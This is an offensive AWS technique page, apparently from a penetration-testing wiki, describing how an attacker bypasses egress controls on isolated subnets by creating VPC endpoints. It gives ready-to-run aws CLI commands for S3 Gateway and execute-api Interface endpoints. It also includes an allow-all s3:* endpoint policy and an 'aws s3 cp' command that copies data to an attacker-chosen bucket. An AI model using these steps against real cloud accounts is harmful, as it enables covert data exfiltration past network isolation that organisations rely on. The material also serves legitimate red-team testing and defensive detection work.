AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

Reading time: 4 minutes

Summary

This technique abuses VPC Endpoints to create exfiltration channels from subnets without Internet Gateways or NAT. Gateway endpoints (e.g., S3) add prefix‑list routes into the subnet route tables; Interface endpoints (e.g., execute-api, secretsmanager, ssm, etc.) create reachable ENIs with private IPs protected by security groups. With minimal VPC/EC2 permissions, an attacker can enable controlled egress that doesn’t traverse the public Internet.

Prereqs: existing VPC and private subnets (no IGW/NAT). You’ll need permissions to create VPC endpoints and, for Option B, a security group to attach to the endpoint ENIs.

Option A – S3 Gateway VPC Endpoint

Variables

• REGION=us-east-1
• VPC_ID=<target vpc>
• RTB_IDS=<comma-separated route table IDs of private subnets>

1. Create a permissive endpoint policy file (optional). Save as allow-put-get-any-s3.json:

{
  "Version": "2012-10-17",
  "Statement": [ { "Effect": "Allow", "Action": ["s3:*"], "Resource": ["*"] } ]
}

2. Create the S3 Gateway endpoint (adds S3 prefix‑list route to the selected route tables):

aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.s3 \
  --vpc-endpoint-type Gateway \
  --route-table-ids $RTB_IDS \
  --policy-document file://allow-put-get-any-s3.json   # optional

Evidence to capture:

• aws ec2 describe-route-tables --route-table-ids $RTB_IDS shows a route to the AWS S3 prefix list (e.g., DestinationPrefixListId=pl-..., GatewayId=vpce-...).
• From an instance in those subnets (with IAM perms) you can exfil via S3 without Internet:

# On the isolated instance (e.g., via SSM):
echo data > /tmp/x.txt
aws s3 cp /tmp/x.txt s3://<your-bucket>/egress-test/x.txt --region $REGION

Option B – Interface VPC Endpoint for API Gateway (execute-api)

Variables

• REGION=us-east-1
• VPC_ID=<target vpc>
• SUBNET_IDS=<comma-separated private subnets>
• SG_VPCE=<security group for the endpoint ENIs allowing 443 from target instances>

1. Create the interface endpoint and attach the SG:

aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.execute-api \
  --vpc-endpoint-type Interface \
  --subnet-ids $SUBNET_IDS \
  --security-group-ids $SG_VPCE \
  --private-dns-enabled

Evidence to capture:

• aws ec2 describe-vpc-endpoints shows the endpoint in available state with NetworkInterfaceIds (ENIs in your subnets).
• Instances in those subnets can reach Private API Gateway endpoints through those VPCE ENIs (no Internet path required).

Impact

• Bypasses perimeter egress controls by leveraging AWS‑managed private paths to AWS services.
• Enables data exfiltration from isolated subnets (e.g., writing to S3; calling Private API Gateway; reaching Secrets Manager/SSM/STS, etc.) without IGW/NAT.